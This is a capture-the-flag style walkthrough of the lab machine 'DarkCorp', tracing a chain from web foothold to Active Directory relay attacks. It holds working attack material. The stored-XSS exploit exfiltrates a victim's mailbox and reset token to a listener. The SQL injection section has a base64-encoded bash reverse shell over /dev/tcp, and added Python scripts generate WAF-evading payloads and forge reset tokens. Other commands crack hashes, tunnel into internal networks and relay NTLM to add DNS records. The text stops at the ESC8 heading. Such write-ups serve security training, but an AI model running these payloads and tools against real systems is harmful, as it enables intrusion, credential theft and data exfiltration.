DarkCorp

Detailed Walkthrough

Initial foothold

Upon establishing a connection to the VPN, the tester began the assessment with service enumeration, which revealed an HTTP service on 80/TCP that redirects to drip.htb.

ffuf was then used to fuzz the Host header for virtual hosts (filtering out the 64-byte response the default vhost returns), which discovered one subdomain:

❯ ffuf -c -u 'http://drip.htb/' -H 'Host: FUZZ.drip.htb' -w /usr/share/seclists/Discovery/Web-Content/raft-large-directories.txt -t 500 -fs 64

        /'___\  /'___\           /'___\       
       /\ \__/ /\ \__/  __  __  /\ \__/       
       \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\      
        \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/      
         \ \_\   \ \_\  \ \____/  \ \_\       
          \/_/    \/_/   \/___/    \/_/       

       v2.1.0-dev
________________________________________________

 :: Method           : GET
 :: URL              : http://drip.htb/
 :: Wordlist         : FUZZ: /usr/share/seclists/Discovery/Web-Content/raft-large-directories.txt
 :: Header           : Host: FUZZ.drip.htb
 :: Follow redirects : false
 :: Calibration      : false
 :: Timeout          : 10
 :: Threads          : 500
 :: Matcher          : Response status: 200-299,301,302,307,401,403,405,500
 :: Filter           : Response size: 64
________________________________________________

mail                    [Status: 200, Size: 5323, Words: 366, Lines: 97, Duration: 128ms]

After adding mail.drip.htb to the hosts file and browsing to it, a Roundcube instance was found running on that subdomain.

Roundcube is a free, open-source, and browser-based webmail application that functions as an IMAP client. It allows users to send, receive, and organize emails directly from any web browser without installing any software on their computer.

The tester registered a new user account and authenticated to the DripMail webmail.

Once authenticated, the following was identified: a further subdomain, drip.darkcorp.htb (from message headers); the mailbox support@drip.htb; Roundcube version 1.6.7; and two installed Roundcube plugins, filesystem_attachments and jqueryui.

Contact Form Misconfiguration

Further enumeration of http://drip.htb revealed a misconfigured /contact endpoint. Intercepting the request in Burp Suite confirmed that the recipient parameter is fully user-controlled, so the form can be made to deliver a message to an arbitrary mailbox without any server-side validation.

POST /contact HTTP/1.1
Host: drip.htb
Content-Length: 106
Cache-Control: max-age=0
Accept-Language: en-US,en;q=0.9
Origin: http://drip.htb
Content-Type: application/x-www-form-urlencoded
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/139.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://drip.htb/index
Accept-Encoding: gzip, deflate, br
Cookie: session=eyJfZnJlc2giOmZhbHNlLCJjc3JmX3Rva2VuIjoiYzY4ZGQwZDM5MTY0OWQzOWFjYTZiZjUxNjJmMTQ0YTc4ODY4NWI5MSJ9.aNIOoA.rBpMe5_fR6NjC53X4Z67HgbWsqI
Connection: keep-alive

name=Intrusionz3r0&email=tester%40drip.htb&message=this+is+a+text&content=text&recipient=tester%40drip.htb

To confirm this, the tester submitted a POST to /contact with the previously created account as recipient. The message arrived in that mailbox together with a confidential note, which revealed another user account, bcase@drip.htb.

Stored Cross-Site Scripting (XSS) in Roundcube Webmail

Later during enumeration, the Roundcube instance (1.6.7) was found to be affected by a stored cross-site scripting vulnerability, CVE-2024-42009 (fixed in Roundcube 1.6.8 and 1.5.8). A crafted HTML email executes attacker-supplied script when the target opens it, inside the target's authenticated webmail session, so the payload can read the mailbox and send its contents to the attacker.

A public exploit for CVE-2024-42009 was downloaded and run, using the unvalidated /contact form as the delivery channel with bcase@drip.htb as recipient and a listener on the tester's machine for the exfiltrated data. It returned bcase's private emails, one of which revealed a further subdomain, dev-a3f1-01.drip.htb:

❯ python3 exploit.py -u 'http://drip.htb/contact' -r bcase@drip.htb -l 10.10.15.44 -p 1234
[*] Crafting payload for http://drip.htb/contact with recipient bcase@drip.htb
[*] Sending payload to http://drip.htb/contact with recipient bcase@drip.htb
[*] Starting HTTP server on port 1234
[+] HTTP server listening on port 1234
[*] Waiting for emails... (Press Ctrl+C to stop manually)
[*] POST request to: /?emails=found
[+] Received 3 emails!

<SNIF>
------------------------------------------------------------
📧 EMAIL UID: 2
------------------------------------------------------------
From: ebelford
Subject: Analytics Dashboard

Message:
Hey Bryce,
The Analytics dashboard is now live. While it's still in development and limited in functionality, it should provide a good starting point for gathering metadata on the users currently using our service.
You can access the dashboard at dev-a3f1-01.drip.htb. Please note that you'll need to reset your password before logging in.
If you encounter any issues or have feedback, let me know so I can address them promptly.
Thanks
------------------------------------------------------------
<SNIF>

[+] Email exfiltration complete! Shutting down server...
[*] Shutting down server...
[+] Server stopped successfully!

Abusing the Forgot Password functionality with CVE-2024-42009

On dev-a3f1-01.drip.htb a password-reset function was identified. Requesting a reset for bcase@drip.htb delivers the reset link to that mailbox, and running the stored XSS exfiltration a second time retrieved it, allowing the bcase@drip.htb password to be changed. The token is only valid for five minutes (see the email below), so the exfiltration has to be triggered immediately after the reset request:

❯ python3 exploit.py -u 'http://drip.htb/contact' -r bcase@drip.htb -l 10.10.15.44 -p 1234
[*] Crafting payload for http://drip.htb/contact with recipient bcase@drip.htb
[*] Sending payload to http://drip.htb/contact with recipient bcase@drip.htb
[*] Starting HTTP server on port 1234
[+] HTTP server listening on port 1234
[*] Waiting for emails... (Press Ctrl+C to stop manually)
[*] POST request to: /?emails=found
[+] Received 5 emails!



------------------------------------------------------------
📧 EMAIL UID: 3
------------------------------------------------------------
From: no-reply@drip.htb
Subject: Reset token

Message:
Your reset token has generated.  Please reset your password within the next 5 minutes.
You may reset your password here:
http://dev-a3f1-01.drip.htb/reset/ImJjYXNlQGRyaXAuaHRiIg.aNIXDg.-Kph-5JxQrB9c4a6EwXoD262JD0
------------------------------------------------------------


[+] Email exfiltration complete! Shutting down server...
[*] Shutting down server...
[+] Server stopped successfully!

With the new password, the tester authenticated to dev-a3f1-01.drip.htb as bcase.
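The reset link above carries an itsdangerous-style timed token (Flask's URLSafeTimedSerializer), and two of its three segments are readable without the key. The following Python is an added example, not code from the original report: it decodes the token from the email to show what the link leaks (target address and issue time) and reproduces the signing scheme for a constructed, hypothetical secret to show what a leaked SECRET_KEY would allow. The salt is assumed to be itsdangerous' default; a real application may pass its own.

```python
"""Decode a Flask/itsdangerous password-reset token without the secret key.

Added example, not code from the original report. TOKEN is the value from the
exfiltrated reset email; the clock values used with still_valid() and the
"hypothetical-secret" used for the forging round-trip are constructed, and the
salt is assumed to be itsdangerous' default (a real app may pass its own).
"""
import base64
import hashlib
import hmac
import json
import zlib
from datetime import datetime, timezone

TOKEN = "ImJjYXNlQGRyaXAuaHRiIg.aNIXDg.-Kph-5JxQrB9c4a6EwXoD262JD0"
RESET_WINDOW_SECONDS = 5 * 60  # "reset your password within the next 5 minutes"


def b64url_decode(segment: str) -> bytes:
    """itsdangerous strips '=' padding from base64url; restore it first."""
    return base64.urlsafe_b64decode(segment + "=" * (-len(segment) % 4))


def b64url_encode(raw: bytes) -> str:
    return base64.urlsafe_b64encode(raw).rstrip(b"=").decode()


def parse_timed_token(token: str) -> dict:
    """Split <payload>.<timestamp>.<signature>.

    Only the last segment is a MAC; the first two are plain base64url, so the
    identity and issue time are readable by anyone who sees the link. The
    payload is JSON (a leading '.' would mean zlib-compressed JSON) and the
    timestamp is a big-endian Unix time (itsdangerous >= 2.0).
    """
    payload_b64, ts_b64, sig_b64 = token.rsplit(".", 2)
    if payload_b64.startswith("."):
        payload = json.loads(zlib.decompress(b64url_decode(payload_b64[1:])))
    else:
        payload = json.loads(b64url_decode(payload_b64))
    issued_at = int.from_bytes(b64url_decode(ts_b64), "big")
    return {
        "payload": payload,
        "issued_at": issued_at,
        "issued_utc": datetime.fromtimestamp(issued_at, tz=timezone.utc).isoformat(),
        "signed_part": f"{payload_b64}.{ts_b64}",
        "signature": b64url_decode(sig_b64),
    }


def still_valid(token: str, now: int) -> bool:
    """The age check the reset endpoint applies (loads(..., max_age=300))."""
    age = now - parse_timed_token(token)["issued_at"]
    return 0 <= age <= RESET_WINDOW_SECONDS


def itsdangerous_signature(signed_part: str, secret_key: str, salt: str) -> bytes:
    """itsdangerous' default signer: HMAC-SHA1 under a key derived as
    sha1(salt + b"signer" + secret_key) (the "django-concat" derivation)."""
    key = hashlib.sha1(salt.encode() + b"signer" + secret_key.encode()).digest()
    return hmac.new(key, signed_part.encode(), hashlib.sha1).digest()


def verify_token(token: str, secret_key: str, salt: str = "itsdangerous") -> bool:
    parts = parse_timed_token(token)
    expected = itsdangerous_signature(parts["signed_part"], secret_key, salt)
    return hmac.compare_digest(expected, parts["signature"])


def forge_token(email: str, issued_at: int, secret_key: str, salt: str = "itsdangerous") -> str:
    """What an attacker can do once Flask's SECRET_KEY leaks: mint a valid
    reset token for any address without touching the victim's mailbox."""
    payload_b64 = b64url_encode(json.dumps(email, separators=(",", ":")).encode())
    ts_bytes = issued_at.to_bytes((issued_at.bit_length() + 7) // 8 or 1, "big")
    signed_part = f"{payload_b64}.{b64url_encode(ts_bytes)}"
    return f"{signed_part}.{b64url_encode(itsdangerous_signature(signed_part, secret_key, salt))}"


if __name__ == "__main__":
    info = parse_timed_token(TOKEN)
    print(f"target={info['payload']} issued={info['issued_utc']} ({info['issued_at']})")
    # Constructed clock: ten minutes after issue, so the link is already dead.
    print("usable now?", still_valid(TOKEN, info["issued_at"] + 600))
```

The token decodes to bcase@drip.htb, issued 2025-09-23 03:42:06 UTC, which is why the timing of the exfiltration matters: still_valid() turns false 300 seconds later. Nothing in the link is secret except the signature, so a reset link is a credential in transit and the mailbox that receives it is the security boundary.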

Discovering a SQL injection vulnerability

During assessment of dev-a3f1-01.drip.htb, a SQL injection vulnerability was identified in the query (search) parameter. The backend is PostgreSQL accessed through psycopg2, and a web application firewall (WAF) in front of the application rejected obvious payloads.

Exploiting the SQL injection

psycopg2 hands the query text to the server as a single simple-query string, so a ';' in the injected value starts a second statement: an anonymous DO block can be stacked onto the search query and used to run COPY ... TO PROGRAM, which executes a shell command as the postgres OS user (it requires superuser or membership of pg_execute_server_program, which the application's database role evidently had). To get past the WAF, the keywords COPY, TO and PROGRAM were assembled at run time inside the block rather than sent literally, using three interchangeable encodings; the resulting command gave a shell on the server as postgres.

#WAF bypass using Replace
query=''; DO $$ DECLARE c TEXT; BEGIN 
    c := REPLACE('C'||'O'||'P'||'Y', 'X', '') || ' (SELECT '''') ' || 
         REPLACE('T'||'O', 'X', '') || ' ' || 
         REPLACE('P'||'R'||'O'||'G'||'R'||'A'||'M', 'X', '') || ' ''echo L2Jpbi9iYXNoIC1pID4mIC9kZXYvdGNwLzEwLjEwLjE1LjQ0LzEyMzQgMD4mMQ==|base64 -d|bash''';
    EXECUTE c; 
END $$;

#WAF bypass using CHR()
query=''; DO $$ 

DECLARE 
    comando TEXT;
BEGIN 
    comando := CHR(67)||CHR(79)||CHR(80)||CHR(89) || ' (SELECT '''') ' ||  CHR(84)||CHR(79) || ' ' || CHR(80)||CHR(82)||CHR(79)||CHR(71)||CHR(82)||CHR(65)||CHR(77) || '''curl 10.10.15.44''';
    EXECUTE comando; 
END $$;

#WAF bypass using Hex String
query=''; DO $$ DECLARE c TEXT; BEGIN 
    c := CONVERT_FROM('\x434f5059', 'UTF8') || ' (SELECT '''') ' || 
         CONVERT_FROM('\x544f', 'UTF8') || ' ' || 
         CONVERT_FROM('\x50524f4752414d', 'UTF8') || ' ''curl 10.10.15.44''';
    EXECUTE c; 
END $$;
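To make the three encodings above reusable, the following Python is an added example (not code from the original report) that builds the same stacked-query payload for an arbitrary command with any of the three keyword encodings, and checks it against a constructed keyword blocklist standing in for the real WAF, whose rules the report does not show.

```python
"""Keyword obfuscation against a signature-based SQL filter (PostgreSQL).

Added example, not code from the original report. The blocklist below is a
constructed stand-in for the WAF on dev-a3f1-01.drip.htb, whose real rules the
report does not show. The builder generalises the three encodings the report
used (REPLACE(), CHR(), CONVERT_FROM() over a hex bytea) to any command and
keeps the "''; " prefix the report used to break out of the search query.
"""
import re

# Constructed stand-in for a naive WAF rule: reject the dangerous keywords as
# whole words, case-insensitively. Plenty of real filters are no smarter.
BLOCKED_KEYWORDS = ("COPY", "PROGRAM", "TO")
_BLOCK_RE = re.compile(r"\b(" + "|".join(BLOCKED_KEYWORDS) + r")\b", re.IGNORECASE)


def waf_blocks(request_body: str) -> bool:
    """True if the stand-in filter would drop this request."""
    return _BLOCK_RE.search(request_body) is not None


# Three spellings of a keyword that never put its bytes on the wire but
# evaluate to it inside PL/pgSQL.
def enc_replace(word: str) -> str:
    """REPLACE('C'||'O'||'P'||'Y', 'X', '') - concatenate one-char literals."""
    return "REPLACE(" + "||".join(f"'{c}'" for c in word) + ", 'X', '')"


def enc_chr(word: str) -> str:
    """CHR(67)||CHR(79)||... - build the word from code points."""
    return "||".join(f"CHR({ord(c)})" for c in word)


def enc_hex(word: str) -> str:
    """CONVERT_FROM('\\x434f5059', 'UTF8') - decode a hex bytea literal."""
    return f"CONVERT_FROM('\\x{word.encode().hex()}', 'UTF8')"


ENCODERS = {"replace": enc_replace, "chr": enc_chr, "hex": enc_hex}


def sql_literal(text: str) -> str:
    """Quote text as a SQL string literal (single quotes are doubled)."""
    return "'" + text.replace("'", "''") + "'"


def build_payload(command: str, encoder: str = "hex") -> str:
    """Stacked-query payload for the `query` parameter.

    psycopg2 sends the whole string as one simple query, so the ';' starts a
    second statement: an anonymous DO block assembles
    COPY (SELECT '') TO PROGRAM '<command>' at run time and EXECUTEs it. The
    command literal is quoted twice because it is itself built from a literal.
    COPY ... TO PROGRAM runs as the postgres OS user and needs superuser or
    pg_execute_server_program membership.
    """
    enc = ENCODERS[encoder]
    inner = sql_literal(command).replace("'", "''")
    dynamic_sql = (
        f"{enc('COPY')} || ' (SELECT '''') ' || "
        f"{enc('TO')} || ' ' || "
        f"{enc('PROGRAM')} || ' {inner}'"
    )
    return f"''; DO $$ DECLARE c TEXT; BEGIN c := {dynamic_sql}; EXECUTE c; END $$;"


def assembled_statement(command: str) -> str:
    """What the DO block ends up executing; useful to eyeball before sending."""
    return f"COPY (SELECT '') TO PROGRAM {sql_literal(command)}"


if __name__ == "__main__":
    plain = assembled_statement("curl 10.10.15.44")
    print("raw statement blocked:", waf_blocks(plain))
    for name in ENCODERS:
        body = build_payload("curl 10.10.15.44", name)
        print(f"{name:8s} blocked={waf_blocks(body)}  query={body}")
```

Only the keywords are encoded; the command itself travels in clear, so a command that contains a blocked word should be wrapped the way the report's first payload does (echo <base64> | base64 -d | bash). The fix on the application side is not a better blocklist but a parameterised query, e.g. cur.execute("... WHERE name ILIKE %s", (term,)), which never lets the search term reach the SQL parser as code.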

Access internal Network

Decrypting GPG files

During server enumeration, the application configuration file was retrieved; it contained database credentials for the dripmail_dba account:

# excerpt from environment configuration
DB_ENGINE=postgresql
DB_HOST=localhost
DB_NAME=dripmail
DB_USERNAME=dripmail_dba
DB_PASS=<SNIF>

SQLALCHEMY_DATABASE_URI='postgresql://dripmail_dba:<SNIF>@localhost/dripmail'
MAIL_DEFAULT_SENDER='support@drip.htb'

A GPG-encrypted SQL database dump was also found at /var/backups/postgres/dev-dripmail.old.sql.gpg, together with a GPG keyring for the postgres user:

postgres@drip:/var/backups/postgres$ ls
dev-dripmail.old.sql.gpg
postgres@drip:/var/backups/postgres$ gpg --list-keys
/var/lib/postgresql/.gnupg/pubring.kbx
--------------------------------------
pub   rsa3072 2025-01-08 [SC] [expires: 2027-01-08]
      3AA1F620319ABF74EF5179C0F426B2D867825D9F
uid           [ultimate] postgres <postgres@drip.darkcorp.htb>
sub   rsa3072 2025-01-08 [E] [expires: 2027-01-08]

The database password from the environment file had been reused as the passphrase of the postgres GPG key, which decrypted the backup:

postgres@drip:/var/lib/postgresql/.gnupg$ gpg --batch --yes --passphrase '<SNIF>' --pinentry-mode loopback --decrypt /var/backups/postgres/dev-dripmail.old.sql.gpg > /dev/shm/decrypt_backup
gpg: encrypted with 3072-bit RSA key, ID 1112336661D8BC1F, created 2025-01-08
      "postgres <postgres@drip.darkcorp.htb>"

The decrypted backup contained application data including the Admins table. Its password column holds 32-hex-character digests consistent with unsalted MD5; these were cracked with hashcat, recovering plaintext passwords for two of the three accounts.


postgres@drip:/dev/shm$ cat decrypt_backup
<SNIF>
COPY public."Admins" (id, username, password, email) FROM stdin;
1	bcase	dc548xxxxxxxxxxxxxxxxxxxxxe7225	bcase@drip.htb
2	victor.r	cac1c7xxxxxxxxxxxxxxxxxxxxx6b9c0	victor.r@drip.htb
3	ebelford	8bbd7xxxxxxxxxxxxxxxx69be86	ebelford@drip.htb
<SNIF>

Credentials found:

  • victor.r:<SNIF>

  • ebelford:<SNIF>

Setting up tunneling with sshuttle

ebelford's recovered password was also valid for the local ebelford account on drip over SSH. From that shell, a route to the internal network 172.16.20.0/24 was discovered, with DC-01 as the default gateway:

ebelford@drip:/dev/shm/.Intrusionz3r0$ route -4
Kernel IP routing table
Destination     Gateway         Genmask         Flags Metric Ref    Use Iface
default         DC-01           0.0.0.0         UG    0      0        0 eth0
172.16.20.0     0.0.0.0         255.255.255.0   U     0      0        0 eth0

A quick ping sweep confirmed several live hosts on the subnet; 172.16.20.3 (TTL 64, 0.027 ms) is drip's own address, while .1 and .2 answer with a Windows TTL of 128. This is an internal network worth pivoting into:

ebelford@drip:/dev/shm/.Intrusionz3r0$ for i in {1..254} ;do (ping -c 1 172.16.20.$i | grep "bytes from" &) ;done
64 bytes from 172.16.20.1: icmp_seq=1 ttl=128 time=1.93 ms
64 bytes from 172.16.20.2: icmp_seq=1 ttl=128 time=2.82 ms
64 bytes from 172.16.20.3: icmp_seq=1 ttl=64 time=0.027 ms

To reach the internal network from the tester's machine, an SSH-based tunnel was established with sshuttle. Its default NAT mode forwards TCP only, so UDP traffic such as DNS queries to the internal resolver is not carried; that matters for the enumeration in the next section:

❯ sudo sshuttle -r ebelford@10.10.11.54 172.16.20.0/24 -v
Starting sshuttle proxy (version 1.3.2).
Connecting to server...
The authenticity of host '10.10.11.54 (10.10.11.54)' can't be established.
ED25519 key fingerprint is SHA256:JNw/rUlpDzlUEzvKKKFQ/M4prRH35ZhHammHWv47SkY.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.10.11.54' (ED25519) to the list of known hosts.
ebelford@10.10.11.54's password: 
 s: Running server on remote host with /usr/bin/python3 (version 3.11.2)
 s: latency control setting = True
 s: auto-nets:False
c : Connected to server.
fw: setting up.
fw: ip6tables -w -t nat -N sshuttle-12300
fw: ip6tables -w -t nat -F sshuttle-12300
fw: ip6tables -w -t nat -I OUTPUT 1 -j sshuttle-12300
fw: ip6tables -w -t nat -I PREROUTING 1 -j sshuttle-12300
fw: ip6tables -w -t nat -A sshuttle-12300 -j RETURN --dest ::1/128 -p tcp
fw: ip6tables -w -t nat -A sshuttle-12300 -j RETURN -m addrtype --dst-type LOCAL
fw: iptables -w -t nat -N sshuttle-12300
fw: iptables -w -t nat -F sshuttle-12300
fw: iptables -w -t nat -I OUTPUT 1 -j sshuttle-12300
fw: iptables -w -t nat -I PREROUTING 1 -j sshuttle-12300
fw: iptables -w -t nat -A sshuttle-12300 -j RETURN --dest 127.0.0.1/32 -p tcp
fw: iptables -w -t nat -A sshuttle-12300 -j REDIRECT --dest 172.16.20.0/24 -p tcp --to-ports 12300
fw: iptables -w -t nat -A sshuttle-12300 -j RETURN -m addrtype --dst-type LOCAL

Compromise WEB-01

Once the tunnel was up, internal Active Directory enumeration was performed to map domain objects and escalation paths. Because the tunnel carries only TCP, name resolution against the internal DNS does not work through it; dnschef was therefore run locally to answer every darkcorp.htb query with 172.16.20.1 (the DC), and bloodhound-python was pointed at it (-ns 127.0.0.1) to collect LDAP data with victor.r's credentials. The collection returned 13 users, 54 groups, 3 GPOs and 3 computers. One side effect of the catch-all resolver is visible in the output: when bloodhound-python contacted WEB-01 and drip for session and local-group data it actually reached DC-01 and skipped them, so that part of the graph is incomplete for those two hosts.

❯ dnschef --fakeip 172.16.20.1 --fakedomains darkcorp.htb
❯ bloodhound-python -c all  -u 'victor.r' -p '<SNIF>'  -d darkcorp.htb -dc DC-01.darkcorp.htb -ns 127.0.0.1 --disable-pooling -w 1 --zip
INFO: BloodHound.py for BloodHound LEGACY (BloodHound 4.2 and 4.3)
WARNING: Could not find a global catalog server, assuming the primary DC has this role
If this gives errors, either specify a hostname with -gc or disable gc resolution with --disable-autogc
INFO: Getting TGT for user
INFO: Connecting to LDAP server: DC-01.darkcorp.htb
INFO: Found 1 domains
INFO: Found 1 domains in the forest
INFO: Found 3 computers
INFO: Connecting to LDAP server: DC-01.darkcorp.htb
INFO: Found 13 users
INFO: Found 54 groups
INFO: Found 3 gpos
INFO: Found 4 ous
INFO: Found 19 containers
INFO: Found 0 trusts
INFO: Starting computer enumeration with 1 workers
INFO: Querying computer: WEB-01.darkcorp.htb
WARNING: DCE/RPC connection failed: The NETBIOS connection with the remote host timed out.
WARNING: DCE/RPC connection failed: [Errno Connection error (172.16.20.1:445)] timed out
INFO: Ignoring host WEB-01.darkcorp.htb since its hostname does not match: Supplied hostname web-01.darkcorp.htb does not match reported hostnames dc-01 or dc-01.darkcorp.htb
INFO: Querying computer: drip.darkcorp.htb
INFO: Ignoring host drip.darkcorp.htb since its hostname does not match: Supplied hostname drip.darkcorp.htb does not match reported hostnames dc-01 or dc-01.darkcorp.htb
INFO: Querying computer: DC-01.darkcorp.htb
INFO: Done in 01M 22S
INFO: Compressing output into 20250923151538_bloodhound.zip

Executing Certipy

Additionally, certipy-ad was used to enumerate the Certificate Authority configuration. It flagged a potential ESC8 condition on DARKCORP-DC-01-CA: web enrollment is enabled over HTTPS only, and certipy could not verify channel binding (EPA) because it could not use NTLM against the endpoint. That is also why the abuse later in this report relays Kerberos rather than NTLM authentication to the CA.

❯ certipy-ad find  -u 'victor.r' -p '<SNIF>' -dc-host DC-01.darkcorp.htb -dc-ip 172.16.20.1 -vulnerable -stdout
Certipy v5.0.3 - by Oliver Lyak (ly4k)

[*] Finding certificate templates
[*] Found 33 certificate templates
[*] Finding certificate authorities
[*] Found 1 certificate authority
[*] Found 11 enabled certificate templates
[*] Finding issuance policies
[*] Found 13 issuance policies
[*] Found 0 OIDs linked to templates
[*] Retrieving CA configuration for 'DARKCORP-DC-01-CA' via RRP
[*] Successfully retrieved CA configuration for 'DARKCORP-DC-01-CA'
[*] Checking web enrollment for CA 'DARKCORP-DC-01-CA' @ 'DC-01.darkcorp.htb'
[!] Failed to check channel binding: NTLM not supported. Try using Kerberos authentication (-k and -dc-host).
[*] Enumeration output:
Certificate Authorities
  0
    CA Name                             : DARKCORP-DC-01-CA
    DNS Name                            : DC-01.darkcorp.htb
    Certificate Subject                 : CN=DARKCORP-DC-01-CA, DC=darkcorp, DC=htb
    Certificate Serial Number           : 27637AF630C1D39945283AF47C89040C
    Certificate Validity Start          : 2024-12-29 23:24:10+00:00
    Certificate Validity End            : 2125-01-22 12:18:28+00:00
    Web Enrollment
      HTTP
        Enabled                         : False
      HTTPS
        Enabled                         : True
        Channel Binding (EPA)           : Unknown
    User Specified SAN                  : Disabled
    Request Disposition                 : Issue
    Enforce Encryption for Requests     : Enabled
    Active Policy                       : CertificateAuthority_MicrosoftDefault.Policy
    Permissions
      Owner                             : DARKCORP.HTB\Administrators
      Access Rights
        ManageCa                        : DARKCORP.HTB\Administrators
                                          DARKCORP.HTB\Domain Admins
                                          DARKCORP.HTB\Enterprise Admins
        ManageCertificates              : DARKCORP.HTB\Administrators
                                          DARKCORP.HTB\Domain Admins
                                          DARKCORP.HTB\Enterprise Admins
        Enroll                          : DARKCORP.HTB\Authenticated Users
    [*] Remarks
      ESC8                              : Channel Binding couldn't be verified for HTTPS Web Enrollment. For manual verification, request a certificate via HTTPS with Channel Binding disabled and observe if the request succeeds or is rejected.
Certificate Templates                   : [!] Could not find any certificate templates

NTLM relay, reverse tunnelling & ESC8 abuse

Internal enumeration also showed that WEB-01 (172.16.20.2) can be coerced into authenticating to an arbitrary host: nxc's coerce_plus module reported it vulnerable to PetitPotam, PrinterBug and MSEven, and SMB signing is not required on it.

❯ nxc smb 172.16.20.2 -u 'victor.r' -p '<SNIF>' -M coerce_plus
SMB         172.16.20.2     445    WEB-01           [*] Windows Server 2022 Build 20348 x64 (name:WEB-01) (domain:darkcorp.htb) (signing:False) (SMBv1:False) 
SMB         172.16.20.2     445    WEB-01           [+] darkcorp.htb\victor.r:<SNIF>
COERCE_PLUS 172.16.20.2     445    WEB-01           VULNERABLE, PetitPotam
COERCE_PLUS 172.16.20.2     445    WEB-01           VULNERABLE, PrinterBug
COERCE_PLUS 172.16.20.2     445    WEB-01           VULNERABLE, PrinterBug
COERCE_PLUS 172.16.20.2     445    WEB-01           VULNERABLE, MSEven

The Kerberos relay needed for ESC8 requires a DNS record in the domain zone that points at the tester's machine. Adding it directly over LDAP with bloodyAD failed, because victor.r lacks the rights to create records:

❯ bloodyAD -k --host DC-01.darkcorp.htb -d darkcorp.htb -u victor.r -p '<SNIF>' add dnsRecord 'DC-011UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAYBAAAA' 10.10.15.44
Traceback (most recent call last):
  File "/usr/bin/bloodyAD", line 8, in <module>
    sys.exit(main())
             ~~~~^^
  File "/usr/lib/python3/dist-packages/bloodyAD/main.py", line 201, in main
    output = args.func(conn, **params)
  File "/usr/lib/python3/dist-packages/bloodyAD/cli_modules/add.py", line 185, in dnsRecord
    conn.ldap.bloodyadd(record_dn, attributes=record_attr)
    ~~~~~~~~~~~~~~~~~~~^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  File "/usr/lib/python3/dist-packages/bloodyAD/network/ldap.py", line 192, in bloodyadd
    raise err
msldap.commons.exceptions.LDAPAddException: LDAP Add operation failed on DN DC=DC-011UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAYBAAAA,DC=darkcorp.htb,CN=MicrosoftDNS,DC=DomainDnsZones,DC=darkcorp,DC=htb! Result code: "insufficientAccessRights" Reason: "b'00000005: SecErr: DSID-03152E29, problem 4003 (INSUFF_ACCESS_RIGHTS), data 0\n\x00'"

WEB-01 (172.16.20.2) hosts an application, the Real Time Status Monitor, that makes outbound HTTP requests to drip.darkcorp.htb and authenticates to it with NTLM as the SVC_ACC account. That authentication can be relayed with ntlmrelayx to LDAP on DC-01 to add the DNS record that victor.r could not, which in turn enables the ESC8 chain: coerce WEB-01 into Kerberos-authenticating to the crafted name, relay that to the CA's web enrollment for a WEB-01 machine certificate, and finally obtain a service ticket as Administrator on WEB-01.

The record name is DC-01's hostname with a base64-encoded CREDENTIAL_TARGET_INFORMATION blob appended (the CredMarshalTargetInfo trick that krbrelayx relies on): a Windows client connecting to that name resolves it to the tester's IP but, when building the SPN, strips the marshalled blob and requests a Kerberos service ticket for DC-01, which is what gets relayed.

Setting up a reverse port forward

To capture that HTTP authentication, a chisel tunnel was set up so that connections arriving at drip.darkcorp.htb are forwarded to the tester's machine, where ntlmrelayx relays them to DC-01 and adds the DNS record:

Intrusionz3r0@kali:$ ./chisel_1.10.1_linux_amd64 server -port 1234 --reverse
ebelford@drip:/dev/shm$ ./chisel client 10.10.15.44:1234 -v 8080:0.0.0.0:80

With the tunnel in place, impacket-ntlmrelayx was started and the authentication was triggered through the Real Time Status Monitor application on WEB-01. The relayed SVC_ACC session added the DNS record (note ntlmrelayx's reminder to tombstone it after the engagement):

❯ impacket-ntlmrelayx -t "ldap://172.16.20.1" --add-dns-record 'dc-011UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAYBAAAA' 10.10.15.44
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies 

[*] Protocol Client HTTPS loaded..
[*] Protocol Client HTTP loaded..
[*] Protocol Client LDAP loaded..
[*] Protocol Client LDAPS loaded..
[*] Protocol Client DCSYNC loaded..
[*] Protocol Client RPC loaded..
[*] Protocol Client SMB loaded..
[*] Protocol Client MSSQL loaded..
[*] Protocol Client IMAP loaded..
[*] Protocol Client IMAPS loaded..
[*] Protocol Client SMTP loaded..
[*] Running in relay mode to single host
[*] Setting up SMB Server on port 445
[*] Setting up HTTP Server on port 80
[*] Setting up WCF Server on port 9389
[*] Setting up RAW Server on port 6666
[*] Multirelay disabled

[*] Servers started, waiting for connections
[*] HTTPD(80): Client requested path: /
[*] HTTPD(80): Client requested path: /
[*] HTTPD(80): Client requested path: /
[*] HTTPD(80): Connection from 127.0.0.1 controlled, attacking target ldap://172.16.20.1
[*] HTTPD(80): Client requested path: /
[*] HTTPD(80): Authenticating against ldap://172.16.20.1 as DARKCORP/SVC_ACC SUCCEED
[*] Enumerating relayed user's privileges. This may take a while on large domains
[*] Checking if domain already has a `dc-011UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAYBAAAA` DNS record
[*] Domain does not have a `dc-011UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAYBAAAA` record!
[*] Adding `A` record `dc-011UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAYBAAAA` pointing to `10.10.15.44` at `DC=dc-011UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAYBAAAA,DC=darkcorp.htb,CN=MicrosoftDNS,DC=DomainDnsZones,DC=darkcorp,DC=htb`
[*] Added `A` record `dc-011UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAYBAAAA`. DON'T FORGET TO CLEANUP (set `dNSTombstoned` to `TRUE`, set `dnsRecord` to a NULL byte)
[*] Dumping domain info for first time
[*] Domain info dumped into lootdir!

Abusing ESC8

